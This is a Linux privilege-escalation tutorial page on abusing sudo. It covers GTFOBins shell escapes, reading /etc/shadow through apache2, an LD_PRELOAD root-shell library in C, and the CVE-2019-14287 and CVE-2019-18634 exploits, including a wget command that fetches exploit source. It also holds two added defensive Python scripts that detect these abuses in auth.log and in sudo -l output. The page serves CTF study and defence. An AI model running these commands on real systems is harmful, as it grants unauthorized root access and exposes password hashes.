# Sudo

## Enumeration

{% hint style="info" %}
Always check `sudo -l` at the beginning of the privilege escalation phase.
{% endhint %}

The command `sudo` allows the current user to execute certain commands as other users. To view a list of such commands:

```bash
sudo -l
```

In the trivial case, the current user can execute any command as any user:

![sudo -l](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MfVMgOApsvayFAAd51K%2F-MfVN8UgPuybLMGXYDVp%2Fimage.png?alt=media\&token=c4b6f594-0cbb-4509-a191-b1bf3e348e18)

In this case we can spawn a root shell directly:

```bash
sudo /bin/bash
```

## Method 1: GTFOBins

For a privesc cheatsheet, check out GTFOBins:

{% embed url="https://gtfobins.github.io/" %}
GTFOBins
{% endembed %}

### Examples

If `find` is in `sudo -l`:

```bash
sudo find /bin -name nano -exec /bin/sh \;
```

If `awk` is in `sudo -l`:

```bash
sudo awk 'BEGIN {system("/bin/sh")}'
```

If `nmap` is in `sudo -l`:

```bash
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
```

If `vim` is in `sudo -l`:

```bash
sudo vim -c ':!/bin/sh'
```

## Method 2: Intended Functionality

### apache2

If `apache2` is in `sudo -l`, then we can read the root password hash from `/etc/shadow` by triggering an error: `apache2` treats the given file as a configuration file, fails to parse it, and echoes the offending first line in its error message, which for `/etc/shadow` is the root entry:

```bash
sudo apache2 -f /etc/shadow
```

### wget

A `wget` privesc example:

{% embed url="https://veteransec.com/2018/09/29/hack-the-box-sunday-walkthrough/" %}
wget privesc
{% endembed %}

## Method 3: LD\_PRELOAD

`LD_PRELOAD` is an environment variable listing shared libraries that the dynamic loader (`/lib/ld-linux.so`) maps into every dynamically linked program before any other library, so functions they export override the standard ones; `/etc/ld.so.preload` does the same thing system-wide. Because of this, `sudo` normally strips `LD_PRELOAD` from the environment, unless the sudoers configuration explicitly keeps it.

If `sudo -l` finds LD\_PRELOAD as well as some sudo command, for example, `/usr/sbin/apache2`:

```bash
env_reset, env_keep+=LD_PRELOAD
...
(root) NOPASSWD: /usr/sbin/apache2
```

then we can utilize this "feature" for privilege escalation. Store the following C program in `/tmp`:

{% code title="x.c" %}

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   // setuid/setgid

// Runs when the loader maps this library into the sudo-launched process
// (built with -nostartfiles, so this _init replaces the C runtime's).
void _init()
{
    unsetenv("LD_PRELOAD"); // Drop LD_PRELOAD so the shell below does not preload us again
    setgid(0);              // Set GID to root
    setuid(0);              // Set UID to root
    system("/bin/bash");    // Execute /bin/bash
}
```

{% endcode %}

Compile it:

```bash
gcc -fPIC -shared -o x.so x.c -nostartfiles
```

Trigger it with any command that `sudo -l` permits (`apache2` is just the example from the rule above):

```bash
sudo LD_PRELOAD=/tmp/x.so /usr/sbin/apache2
```

Then we will get a root shell.
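Each of the invocations in Methods 1 to 3 is written by sudo to the system log (`auth.log` on Debian-derived systems, `secure` on Red Hat-derived ones) as a `user : TTY=... ; PWD=... ; USER=... ; COMMAND=...` record, with command-line environment variables recorded in an `ENV=` field. The following Python script is an added example, not code from this page or from any tool it links: it parses that record format and flags the shell-escape argument patterns shown above, `apache2 -f` pointed at something other than a configuration file, and `LD_PRELOAD` passed on the sudo command line. The log lines are constructed for the example, and the binary list and indicator strings are assumptions drawn from this page rather than a complete ruleset.

```python
import os
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample auth.log lines (not taken from the page or any real host).
# They mirror the sudo invocations shown above plus one benign entry and one
# unrelated sshd line, in the "sudo: user : K=V ; ... ; COMMAND=..." format
# the sudoers plugin sends to syslog.
SAMPLE_AUTH_LOG = """\
Jun 12 10:00:01 host sudo:      bob : TTY=pts/0 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/find /bin -name nano -exec /bin/sh \\;
Jun 12 10:00:05 host sudo:      bob : TTY=pts/0 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/awk BEGIN {system("/bin/sh")}
Jun 12 10:00:09 host sudo:      bob : TTY=pts/0 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/nmap --script=shell.nse
Jun 12 10:00:12 host sudo:      bob : TTY=pts/0 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/vim -c :!/bin/sh
Jun 12 10:00:16 host sudo:      bob : TTY=pts/0 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/sbin/apache2 -f /etc/shadow
Jun 12 10:00:20 host sudo:      bob : TTY=pts/0 ; PWD=/home/bob ; USER=root ; ENV=LD_PRELOAD=/tmp/x.so ; COMMAND=/usr/sbin/apache2
Jun 12 10:01:00 host sudo:    alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update
Jun 12 10:01:30 host sshd[123]: Accepted publickey for alice from 10.0.0.5 port 50000 ssh2
"""

# Binaries this page shows escaping to a shell (or reading files) via sudo. Assumed list.
ESCAPE_BINARIES = {"find", "awk", "nmap", "vim", "apache2", "wget"}
# Argument fragments that turn one of those binaries into a shell. Assumed list.
SHELL_INDICATORS = ("/bin/sh", "/bin/bash", "system(", ":!", "--script=", "-exec ")

LINE_RE = re.compile(r"\bsudo:\s+(?P<user>\S+) : (?P<rest>.*)$")


def parse_sudo_line(line: str) -> Optional[Tuple[str, Dict[str, str], str]]:
    """Return (user, fields, command) for a sudo command record, or None for other lines."""
    m = LINE_RE.search(line)
    if not m:
        return None
    # COMMAND= is always the last field and may itself contain spaces and '='.
    head, sep, command = m.group("rest").partition(" ; COMMAND=")
    if not sep:
        return None  # a sudo line without a command record (e.g. an auth failure)
    fields: Dict[str, str] = {}
    for item in head.split(" ; "):
        key, _, value = item.partition("=")
        fields[key] = value
    return m.group("user"), fields, command


def classify(fields: Dict[str, str], command: str) -> List[str]:
    """Apply the detection rules to one parsed sudo record; return the reasons that fire."""
    reasons: List[str] = []
    argv = command.split()
    binary = os.path.basename(argv[0]) if argv else ""
    if "LD_PRELOAD" in fields.get("ENV", ""):
        reasons.append("LD_PRELOAD passed through sudo (env_keep abuse)")
    if binary in ESCAPE_BINARIES and any(ind in command for ind in SHELL_INDICATORS):
        reasons.append(f"shell escape via {binary}")
    if binary == "apache2" and "-f" in argv:
        i = argv.index("-f")
        cfg = argv[i + 1] if i + 1 < len(argv) else ""
        if not cfg.startswith("/etc/apache2/"):
            reasons.append(f"apache2 -f pointed at {cfg or '<missing>'}: file disclosure via parse error")
    return reasons


def scan_auth_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (user, command, reason) for every suspicious sudo record in the log text."""
    findings: List[Tuple[str, str, str]] = []
    for line in text.splitlines():
        parsed = parse_sudo_line(line)
        if parsed is None:
            continue
        user, fields, command = parsed
        for reason in classify(fields, command):
            findings.append((user, command, reason))
    return findings


if __name__ == "__main__":
    for user, command, reason in scan_auth_log(SAMPLE_AUTH_LOG):
        print(f"[{reason}] {user}: {command}")
```

Run against the constructed sample it reports six findings, all for `bob`, and nothing for the `apt update` line; in practice you would feed it the tail of the real log and tune `ESCAPE_BINARIES` to the binaries actually granted in your sudoers.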

## Method 4: Attacking Sudo Itself

### CVE-2019-14287

{% embed url="https://www.exploit-db.com/exploits/47502" %}
sudo 1.8.27 - Security Bypass
{% endembed %}

If `sudo -l` shows we can execute `/bin/bash` as any user other than root:

```bash
(ALL, !root) /bin/bash
```

Joe Vennix found that if you specify a UID of -1 (or its unsigned equivalent: 4294967295), Sudo would incorrectly read this as being 0 (i.e. root). This means that by specifying a UID of -1 or 4294967295, you can execute a command as root, despite being explicitly prevented from doing so.

That means we can get a root shell using the following payload:

```bash
sudo -u#-1 /bin/bash
```

Test this CVE in TryHackMe:

{% embed url="https://tryhackme.com/room/sudovulnsbypass" %}
Sudo Security Bypass - TryHackMe
{% endembed %}

### CVE-2019-18634

{% embed url="https://www.exploit-db.com/exploits/47995" %}
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow
{% endembed %}

In `/etc/sudoers`, there is an option named `pwfeedback`, which is turned off by default. If it is turned on, sudo gives you "feedback" while you type your password by showing an asterisk for each character you type.

In Sudo 1.8.25p, this `pwfeedback` option leads to a buffer overflow vulnerability if it is turned on. To exploit this vulnerability, download the C source code:

```bash
wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c
```

Compile it:

```bash
gcc -o exploit exploit.c
```

Give permission and run it:

```bash
chmod +x exploit ; ./exploit
```

Test this CVE in TryHackMe:

{% embed url="https://tryhackme.com/room/sudovulnsbof" %}
Sudo Buffer Overflow - TryHackMe
{% endembed %}
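Read from the defender's side, every condition used on this page is visible in `sudo -l` output before anyone abuses it. The script below is an added example, not the page's own code or any tool's: it parses the Defaults and command sections of `sudo -l` and reports `ALL` rules (the trivial case in the Enumeration section), rules on binaries this page shows escaping to a shell, negated runas specs of the `(ALL, !root)` form, `pwfeedback`, and `env_keep` entries that preserve loader variables. The sample output is constructed for the example, and the binary list is an assumption taken from this page.

```python
import os
import re
from typing import List, Tuple

# Constructed `sudo -l` output (not from the page or any real host), combining
# the risky settings described above with one harmless rule.
SAMPLE_SUDO_L = """\
Matching Defaults entries for bob on host:
    env_reset, pwfeedback, mail_badpass, env_keep+=LD_PRELOAD,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User bob may run the following commands on host:
    (root) NOPASSWD: /usr/sbin/apache2
    (ALL, !root) /bin/bash
    (ALL : ALL) ALL
    (root) /usr/bin/find, /usr/bin/awk
    (root) /usr/bin/systemctl restart nginx
"""

# Binaries this page shows escaping to a shell or reading files via sudo. Assumed list.
ESCAPE_BINARIES = {"find", "awk", "nmap", "vim", "apache2", "wget"}
# Loader variables that must never survive into a sudo-launched process.
LOADER_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH")

RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<rest>.*)$")


def split_sections(text: str) -> Tuple[List[str], List[str]]:
    """Split `sudo -l` output into Defaults tokens and command-rule lines."""
    defaults: List[str] = []
    rules: List[str] = []
    mode = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Matching Defaults entries"):
            mode = "defaults"
        elif line.startswith("User ") and "may run" in line:
            mode = "rules"
        elif mode == "defaults":
            defaults.extend(t.strip() for t in line.rstrip(",").split(",") if t.strip())
        elif mode == "rules":
            rules.append(line)
    return defaults, rules


def audit_defaults(defaults: List[str]) -> List[str]:
    """Flag Defaults settings that weaken sudo's own protections."""
    findings: List[str] = []
    if "pwfeedback" in defaults:
        findings.append("pwfeedback enabled (CVE-2019-18634 exposure on unpatched sudo)")
    if "!env_reset" in defaults:
        findings.append("env_reset disabled: caller environment reaches the command")
    for token in defaults:
        if token.startswith("env_keep") and any(v in token for v in LOADER_VARS):
            findings.append(f"loader variable preserved: {token}")
    return findings


def audit_rules(rules: List[str]) -> List[str]:
    """Flag command rules that grant a shell directly or through a known escape."""
    findings: List[str] = []
    for rule in rules:
        m = RULE_RE.match(rule)
        if not m:
            continue
        runas, rest = m.group("runas"), m.group("rest")
        tokens = rest.split()
        while tokens and tokens[0].endswith(":"):  # strip tags such as NOPASSWD:
            tokens.pop(0)
        commands = [c.strip() for c in " ".join(tokens).split(",") if c.strip()]
        if "!" in runas:
            findings.append(f"negated runas '({runas})': bypassable via CVE-2019-14287 on unpatched sudo")
        for cmd in commands:
            if cmd == "ALL":
                findings.append(f"unrestricted rule '({runas}) ALL'")
                continue
            binary = os.path.basename(cmd.split()[0])
            if binary in ESCAPE_BINARIES:
                findings.append(f"shell-escape capable binary {binary} allowed as ({runas})")
    return findings


def audit_sudo_l(text: str) -> List[str]:
    """Audit full `sudo -l` output; returns one human-readable finding per issue."""
    defaults, rules = split_sections(text)
    return audit_defaults(defaults) + audit_rules(rules)


if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE_SUDO_L):
        print("-", finding)
```

Pipe real output in with `sudo -l | python3 audit.py`-style plumbing (reading `sys.stdin.read()` instead of the sample) to run it on a host; the `systemctl` rule in the sample produces no finding, which is the point: narrow, argument-bound rules on non-interpreting binaries are what a sudoers file should consist of.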

## Challenge: TryHackMe - Simple CTF

{% embed url="https://www.ctfwriteup.com/tryhackme/tcm-linux-privesc-course/simple-ctf-easy" %}
TryHackMe - Simple CTF
{% endembed %}
